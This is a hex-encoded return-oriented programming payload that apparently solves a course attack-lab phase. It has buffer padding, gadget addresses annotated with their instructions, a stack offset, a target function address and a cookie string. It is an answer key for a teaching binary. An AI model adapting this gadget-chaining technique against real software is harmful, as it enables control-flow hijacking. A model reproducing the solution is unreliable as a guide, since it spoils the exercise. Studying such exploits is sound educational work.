ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff
06 1a 40 00 00 00 00 00	/* movq   %rsp,%rax */
a2 19 40 00 00 00 00 00	/* movq   %rax,%rdi */
ab 19 40 00 00 00 00 00	/* popq   %rax */
48 00 00 00 00 00 00 00	/* $0x48 */
dd 19 40 00 00 00 00 00	/* movl   %eax,%edx */
70 1a 40 00 00 00 00 00	/* movl   %edx,%ecx */
13 1a 40 00 00 00 00 00	/* movl   %ecx,%esi */
d6 19 40 00 00 00 00 00	/* <add_xy> */
a2 19 40 00 00 00 00 00	/* movq   %rax,%rdi */
fa 18 40 00 00 00 00 00	/* $0x4018fa */
35 39 62 39 39 37 66 61 00	/* "59b997fa" */